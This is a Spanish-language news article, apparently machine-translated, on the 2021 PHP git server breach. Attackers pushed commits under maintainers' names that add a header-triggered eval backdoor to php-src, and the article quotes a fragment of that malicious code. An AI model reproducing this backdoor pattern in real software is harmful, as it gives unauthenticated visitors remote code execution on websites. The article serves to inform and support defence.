Heaven32

Menu
  • Inicio
  • Internacional
    • España
  • Política
  • Bolsa e inversión
    • Criptomonedas
  • Tecnología
    • Videojuegos
    • Gadgets
  • Estilo vida
    • Deportes
    • Ciencia
    • Motor
    • Recetas
    • Cultura y Ocio
    • Viajar
    • Horóscopo
    • Televisión
  • Nuevo – Descargas

Los piratas informáticos backdoor código fuente PHP después de violar el servidor interno de git

30 marzo, 2021 No hay comentarios
Una puerta de dibujos animados conduce a una pared de código de computadora.

Un pirata informático comprometió el servidor utilizado para distribuir el lenguaje de programación PHP y agregó una puerta trasera al código fuente que habría hecho que los sitios web fueran vulnerables a una adquisición completa, dijeron miembros del proyecto de código abierto.

Dos actualizaciones enviadas al servidor PHP Git durante el fin de semana agregaron una línea que, si la ejecutaba un sitio web con PHP, habría permitido a los visitantes sin autorización ejecutar el código de su elección. El malintencionado comete aquí y aquí le dio al código la capacidad de inyección de código a los visitantes que tenían la palabra «zerodium» en un encabezado HTTP.

PHP.net pirateado, código con puerta trasera

Las confirmaciones se realizaron en el repositorio php-src con los nombres de cuenta de dos conocidos desarrolladores de PHP, Rasmus Lerdorf y Nikita Popov. «Aún no sabemos exactamente cómo sucedió esto, pero todo apunta a un compromiso del servidor git.php.net (en lugar de un compromiso de una cuenta individual de git)», escribió Popov en un aviso publicado el domingo por la noche.

A raíz del compromiso, Popov dijo que los mantenedores de PHP han concluido que su infraestructura Git independiente es un riesgo de seguridad innecesario. Como resultado, descontinuarán el servidor git.php.net y harán de GitHub la fuente oficial de repositorios PHP. En el futuro, todos los cambios en el código fuente de PHP se realizarán directamente en GitHub en lugar de en git.php.net.

Los cambios maliciosos llamaron la atención del público a más tardar el domingo por la noche por parte de desarrolladores como Markus Staab, Jake Birchallf y Michael Voříšek mientras examinaban un compromiso realizado el sábado. La actualización, que pretendía corregir un error tipográfico, se realizó con una cuenta que usaba el nombre de Lerdorf. Poco después del primer descubrimiento, Voříšek detectó la segunda confirmación maliciosa, que se realizó con el nombre de cuenta de Popov. Pretendía revertir la corrección de errores tipográficos anterior.

Los piratas informáticos backdoor código fuente PHP después de violar el servidor interno de git 1

Los piratas informáticos backdoor código fuente PHP después de violar el servidor interno de git 2

Anuncio publicitario

Ambas confirmaciones agregaron las mismas líneas de código:

onvert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {
		zend_try {
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

Zerodium es un corredor que compra exploits a investigadores y los vende a agencias gubernamentales para su uso en investigaciones u otros fines. No está claro por qué las confirmaciones hacen referencia a Zerodium. El director ejecutivo de la empresa, Chaouki Bekrar, dicho en Twitter el lunes que Zerodium no estaba involucrado.

«Saludos al troll que puso ‘Zerodium’ en las confirmaciones comprometidas de git PHP de hoy», escribió. “Obviamente, no tenemos nada que ver con esto. Probablemente, los investigadores que encontraron este error / exploit intentaron venderlo a muchas entidades, pero ninguna quería comprar esta porquería, así que lo quemaron por diversión.

Saludos al troll que puso «Zerodium» en las confirmaciones comprometidas de git PHP de hoy. Obviamente, no tenemos nada que ver con esto.

Probablemente, los investigadores que encontraron este error / exploit intentaron venderlo a muchas entidades, pero ninguna quería comprar esta basura, así que la quemaron por diversión 😃

– Chaouki Bekrar (@cBekrar) 29 de marzo de 2021

Karma negativo

Antes del compromiso, PHP Group manejaba todos los accesos de escritura al repositorio en su propio servidor git http://git.php.net/ usando lo que Popov llamó un sistema «de cosecha propia» llamado Karma. Proporcionó a los desarrolladores diferentes niveles de privilegios de acceso en función de contribuciones anteriores. Mientras tanto, GitHub había sido un repositorio espejo.

Ahora, PHP Group está abandonando la infraestructura de git autohospedada y administrada y reemplazándola con GitHub. El cambio significa que GitHub es ahora el repositorio «canónico». El Grupo PHP ya no utilizará el sistema Karma. En cambio, los contribuyentes tendrán que ser parte de la organización PHP en GitHub y deben usar la autenticación de dos factores para las cuentas con la capacidad de realizar confirmaciones.

El evento de este fin de semana no es la primera vez que los servidores de php.net han sido violados con la intención de realizar un ataque a la cadena de suministro. A principios de 2019, el repositorio de aplicaciones y extensiones PHP, ampliamente utilizado, cerró temporalmente la mayor parte del sitio después de descubrir que los piratas informáticos reemplazaron el administrador de paquetes principal por uno malicioso. Los desarrolladores del grupo dijeron que cualquiera que haya descargado el administrador de paquetes en los últimos seis meses debería obtener una nueva copia.

PHP ejecuta un estimado 80 por ciento de los sitios web. No hay informes de sitios web que incorporen cambios maliciosos en sus entornos de producción.

Los cambios probablemente fueron realizados por personas que querían presumir de su acceso no autorizado al servidor PHP Git en lugar de aquellos que intentaban hacer puertas traseras a sitios web que usan PHP, dijo HD Moore, cofundador y CEO de la plataforma de descubrimiento de redes Rumble.

«Parece que los atacantes están controlando Zerodium o tratando de dar la impresión de que el código estuvo oculto por mucho más tiempo», le dijo a Ars. «De cualquier manera, pasaría mucho tiempo revisando confirmaciones anteriores si tuviera algún interés de seguridad en PHP».

Share
Tweet
Pinterest
Linkedin
Email
Prev Article
Next Article
Tags:backdoor código después fuente Git informáticos interno los PHP piratas servidor violar

Leave a Reply

Cancelar la respuesta

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Top del Día

  • FirstHeaven32: Las mejores historias de hoy | Tiempos financieros 3
    FirstHeaven32: Las mejores historias de hoy | Tiempos financieros
  • RBC Heritage: Stewart Cink logra una ventaja de cinco golpes tras 63 segundos consecutivos | Noticias de golf 4
    RBC Heritage: Stewart Cink logra una ventaja de cinco golpes tras 63 segundos consecutivos | …
  • Voice Remote Pro de Roku tiene algunos problemas con los botones de transmisión 5
    Voice Remote Pro de Roku tiene algunos problemas con los botones de transmisión

Heaven32

Entradas Top

  • Para encontrar los mejores candidatos, nunca debe decir esto en un anuncio de trabajo.
  • Erling Haland en el centro de atención, pero Jude Bellingham brilla contra Man City | …
  • La limitación de Twitter de Rusia puede dar a los censores capacidades nunca antes vistas
  • Se dice que la casa club cree que ahora vale $ 4 mil millones
  • 2022 El Mercedes-Benz Clase CLS obtiene un diseño actualizado

Más Visto Hoy

  • Pronóstico semanal: 12-16 de diciembre Abril de 2021 – Júpiter Trígono Marte – Bust A …
  • Falleció el prometido del rapero AKA, Nellie Tembe (22)
  • Mujer confunde TikTok con un tributo ‘aleatorio’ de un plato dulce de Union Jack al …
  • Las papilas gustativas humanas pueden diferenciar entre agua normal y agua ‘pesada’
  • Boehner critica el extremismo en el Partido Republicano, describe la ira por el asedio del …

Te puede Interesar

  • Apple eliminó la sección "Calificaciones y reseñas" de todas las páginas de productos en su …
  • Apple confirma que el soporte de archivos XML ya no está disponible en Catalina, recomienda …
  • Es poco probable que el cambio de liderazgo de Alphabet signifique mucho para los empleados …
  • DocuSign adquiere Seal Software, que desarrolla software de descubrimiento y gestión de contratos impulsado por …
  • Contacto
  • Cookies
  • Política de Privacidad
Copyright © 2021 Heaven32